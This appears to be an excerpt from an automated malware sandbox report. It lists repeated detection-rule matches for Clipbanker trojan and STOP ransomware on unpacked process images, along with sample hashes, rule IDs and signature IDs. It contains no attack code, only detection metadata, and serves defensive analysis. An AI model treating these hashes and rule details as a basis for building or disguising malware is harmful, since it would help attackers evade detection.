            Source: 22.2.build3.exe.9815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 41.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 41.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 30.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 30.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 26.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 26.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 40.2.mstsca.exe.8915a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 40.2.mstsca.exe.8915a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 5.2.qJKiVKZdFk.exe.5de15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 5.2.qJKiVKZdFk.exe.5de15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 25.2.qJKiVKZdFk.exe.5e015a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 25.2.qJKiVKZdFk.exe.5e015a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 31.2.qJKiVKZdFk.exe.5e715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 31.2.qJKiVKZdFk.exe.5e715a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 39.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 39.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 27.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 27.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 41.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 41.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 30.2.mstsca.exe.8915a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 30.2.mstsca.exe.8915a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 39.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 39.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 27.2.build3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 27.2.build3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 7.2.qJKiVKZdFk.exe.5dc15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 7.2.qJKiVKZdFk.exe.5dc15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 22.2.build3.exe.9815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 22.2.build3.exe.9815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 5.2.qJKiVKZdFk.exe.5de15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 5.2.qJKiVKZdFk.exe.5de15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 0.2.qJKiVKZdFk.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 0.2.qJKiVKZdFk.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 38.2.qJKiVKZdFk.exe.5e615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 38.2.qJKiVKZdFk.exe.5e615a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 38.2.qJKiVKZdFk.exe.5e615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 38.2.qJKiVKZdFk.exe.5e615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 23.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 23.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 32.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 32.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 21.2.qJKiVKZdFk.exe.5e815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 21.2.qJKiVKZdFk.exe.5e815a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 25.2.qJKiVKZdFk.exe.5e015a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 25.2.qJKiVKZdFk.exe.5e015a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 21.2.qJKiVKZdFk.exe.5e815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 21.2.qJKiVKZdFk.exe.5e815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 7.2.qJKiVKZdFk.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 7.2.qJKiVKZdFk.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 23.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 23.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 31.2.qJKiVKZdFk.exe.5e715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 31.2.qJKiVKZdFk.exe.5e715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 26.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 26.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 32.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 32.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 8.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 8.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
